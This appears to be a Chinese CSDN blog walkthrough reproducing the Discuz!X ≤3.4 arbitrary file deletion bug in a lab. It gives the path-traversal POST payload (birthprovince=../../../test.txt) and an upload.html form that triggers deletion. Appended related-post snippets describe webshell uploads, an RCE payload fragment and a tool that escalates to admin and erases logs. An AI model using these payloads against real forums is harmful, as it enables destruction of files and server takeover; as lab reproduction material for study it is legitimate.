Discuz2.5-3.4任意文件删除漏洞分析

最新推荐文章于 2024-06-22 16:25:24 发布
最新推荐文章于 2024-06-22 16:25:24 发布
阅读量609 收藏
点赞数
文章标签: 渗透测试 discuz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyh0519111/article/details/118107014
版权

Discuz!X ≤3.4 任意文件删除漏洞

 

Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。

2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。

修复建议

升级到最新版本的 Discuz!

实验环境

  • 操作机:centos7
  • 目标地址:192.168.0.105
  • Discuz版本:3.1

实验步骤

步骤1:了解原理

该漏洞于2014年6月被提交到 Wooyun漏洞平台,Seebug漏洞平台收录了该漏洞,漏洞编号 ssvid-93588。该漏洞通过配置属性值,导致任意文件删除。经过分析确认,原有的利用方式已经被修复,添加了对属性的 formtype 判断,但修复方式不完全导致可以绕过,通过模拟文件上传可以进入其他 unlink 条件,实现任意文件删除漏洞。

步骤2:新建text.txt文件

步骤3:新建用户

打开浏览器,输入目标地址192.168.0.105进入到目标网站,然后点击右上角的注册,注册一个测试账户。

步骤4:发送请求

登录成功之后,点击设置

打开开发者工具找到hackbar功能,向目标链接,输入以下命令

http://192.168.0.105/home.php?mod=spacecp&ac=profile&op=base(此为基本资料选项卡url)

发送如下的post请求,注意,这里formhash的值会变化,所以需要修改,在当前页面右键查看源代码,搜索formhash即可获取最新的值。

birthprovince=../../../test.txt&profilesubmit=1&formhash=c5ee361e

其中test.txt为我们要删除的文件,formhash为用户的独有参数,可以通过查看源代码,搜索该参数来获得它的值,如下图。

点击Execute按钮。刷新后页面改变

说明我们的脏数据已经进入数据库了。

步骤5:上传文件

 

新建一个upload.html,代码如下,[form-hash]改成你的formhash:

<body>
    <form action="http://192.168.0.105/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>

在网页中随便下载一张图片打开upload.html点击上传

 

再次访问http://192.168.0.105/test.txt,发现文件成功被删除。

老北京砸酱锤
关注
Discuz X3.2版的任意文件删除漏洞
xd_12138的博客
11-28 8129
漏洞测试环境如下:PHP5.2+MYSQL+ Discuz X3.2   搭建好 Discuz X3.2环境后,首先在服务器下新建一个文本文档作为目标文件 然后按照正常用户步骤操作,登录论坛后在如下界面中点击  设置  跳转至下图界面 注意注意,重点来了 访问URL 为 http://10.1.1.100/discuz-X3.2/upload/home.php?mod=sp...
利用Vulnhub复现漏洞 - Discuz!X ≤3.4 任意文件删除漏洞
JiangBuLiu的博客
06-28 3226
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现FormhashCookie发送数据包 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个...
DZ(discuz) x2.5 爆路径漏洞
收集盒 Book box
11-20 2655
/* just for search DZ x2.5 爆路径 绝对路径 dzx2.5爆路径 dz2.5爆路径 dz x.25 Dz x.25 DZ 2.5 */ 白肚 & 股沟 没找到dzx2.5的爆路径的漏洞 遂拿自己写的那个白盒测试挖洞辅助工具 果断秒杀之 发出来共享之 爆路径文件如下: /uc_server/control/admin/db.php /source/plug
20分钟攻破DISCUZ论坛并盗取数据库(web安全白帽子)
最新发布
qq_44870829的博客
06-22 1323
1 快速搭建discuz论坛 2 使用kali下burpsuite对discuz后台注入PHP木马 3 使用cknife “菜刀” 上传webshell 木马到网站 4 使用webshell查看mysql数据库密码并盗取数据库
DiscuzX ≤3.4 任意文件删除漏洞
zizizizizi_的博客
01-17 2764
Discuz!X ≤3.4 任意文件删除漏洞 一、漏洞思路 通过配置个人信息的属性值,删除任意文件 版本 :discuz <= 3.4 二、漏洞复现 1.安装数据库 2.查看robots文件,发现文件存在 3.注册登录,进入设置界面 4.找到formhash值并记录 5.点击保存 ,bp拦截 发送如下 ...
Discuz!X ≤3.4 任意文件删除漏洞
qq_52627570的博客
05-23 363
在浏览器中输入:http://your ip/install/index.php?在浏览器中输入:http://your ip/robots.txt。数据库服务器选择db,其他不改变,记得输入管理员密码哦。点击进入数据库,在设置->个人资料中随意填写一个信息。建立一个upload.html。在浏览器打开,并上传一个图片。提交后,发现信息已改变。至此,漏洞利用结束。
漏洞复现-DiscuzX ≤3.4 任意文件删除漏洞
qq_59350385的博客
05-10 905
一、环境搭建 本次用的是vulhub靶场 执行下列命令部署 Discuz!X 安装环境 docker-compose up -d 安装时,只用修改数据库地址为`db`,其他保持默认即可: 二、漏洞复现 (1)访问`http://your-ip/robots.txt`可见robots.txt是存在的: (2)注册用户hahaha (3)在个人设置页面找到自己的formhash (4)带上自己的Cookie、formhash发送如下数据包 (5)查看个人设置页面的出生地
Discuz-DiscuzX-3.4.zip
03-23
《深入解析Discuz! X3.4:构建与优化社区论坛》 Discuz! X3.4是一款由Comsenz公司开发的开源社区论坛软件,它基于PHP编程语言和MySQL数据库,是Discuz!系列的其中一个重要版本。该版本在前作的基础上进行了诸多改进...
Discuz-X2.5-SC-UTF8
09-24
Discuz! X2.5 SC UTF8:社区论坛构建详解》 Discuz! X2.5 SC UTF8是一款基于PHP和MySQL的开源社区论坛软件,由Comsenz公司开发,广泛应用于搭建中文网络社区。"SC"代表简体中文(Simplified Chinese),而"UTF8...
discuz-x3.4-sc-utf8-20220811,tar,gz
12-13
标题 "discuz-x3.4-sc-utf8-20220811.tar.gz" 暗示了这是一个Discuz! X3.4简体中文UTF-8编码的论坛软件版本,发布于2022年8月11日,并且已经被打包成tar.gz格式的压缩文件Discuz! 是一款广泛使用的开源论坛软件,...
政政Discuz!NT 2.5.0 漏洞利用工具 1
02-11
软件名:政政Discuz!NT 2.5.0 漏洞利用工具 1.0 程序帮助: 1、先检测该论坛是否存在此漏洞 2、注册一个普通的帐号,提权成为管理员 3、更新ASPX为可上传,主要是为了上传ASPX木马的 4、去发表一个帖子,把你的ASPX木马上传上去。 5、去后台找附件的绝对路径,登陆你的ASPX木马 6、删除前台自己发的帖子,保留附件 7、更新ASPX不可上传,取后门 8、删除自己的相关日志 9、取消自己的管理员身份 10、完毕,成功拿到一台webshell ASPX木马的一般权限都很大,很好提权,拿到一台webshell也意味着你拿了一台服务器哦~!
discuz discuz_admincp.php 讲解,Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)
weixin_39740419的博客
03-19 693
0x00 漏洞简述漏洞信息8月27号有人在GitHub上公布了有关Discuz 1.5-2.5版本中后台数据库备份功能存在的命令执行漏洞的细节。漏洞影响版本Discuz! 1.5-2.50x01 漏洞复现官方论坛下载相应版本就好。0x02 漏洞分析需要注意的是这个漏洞其实是需要登录后台的,并且能有数据库备份权限,所以比较鸡肋。我这边是用Discuz! 2.5完成漏洞复现的,并用此进行漏洞分析的。漏...
Discuz!X 前台任意文件删除漏洞复现测试
黑面狐
09-30 4502
今天看到一个Discuz!X 前台任意文件删除漏洞。 自己本机搭建环境进行测试 环境搭建我用的是Discuz 3.4版本的。phpstudy  环境搭建完毕后,注册一个账号。 到达个人信息修改页面。 拦截数据包,修改birthprovince参数为文件站点存在的文件。。比如我要测试删除这个group.php文件。 发送包以后我们还要构造请求去执行删除文件
Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]
oceanark的博客
07-13 2683
----------- 首先膜拜大牛的共享精神,我淫比较懒试了几个站都没成功就不弄了,但有人说成功了,不知道是PR问题还是补丁了   正文:前面省略一万+字。。。。 利用方法 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),
【研究】Discuz3.4任意文件删除漏洞
weixin_30909575的博客
10-22 259
这里以Discuz3.2为例 关键字:Powered by Discuz! X3.2 时间有限,就不一一截图了,Discuz所有页面全在Discuz_X3.2_SC_UTF8/upload/目录下 利用过程: 访问http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/robots.txt试试,这是我虚机中discuz中robots的路径,具体视个人...
PHP代码审计 ----- 任意文件读取 & 删除漏洞
qq_62344745的博客
04-19 930
通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件
【代码审计】任意文件删除漏洞实例
05-04 740
【代码审计】任意文件删除漏洞实例   任意文件删除漏洞,该漏洞可让攻击者随意删除服务器上的任意文件。   环境搭建: CSCMS :http://www.chshcms.com/ 网站源码版本:Cscms_v4.1正式版(发布日期:2017-06-05) 程序源码下载:https://github.com/chshcms/cscms ...
DZ x2.5 爆路径漏洞
fengling132的专栏
08-23 852
测试exp:    http://localhost/uc_server/control/admin/db.php    http://localhost/source/plugin/myrepeats/table/table_myrepeats.php    http://localhost/install/include/install_lang.php
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值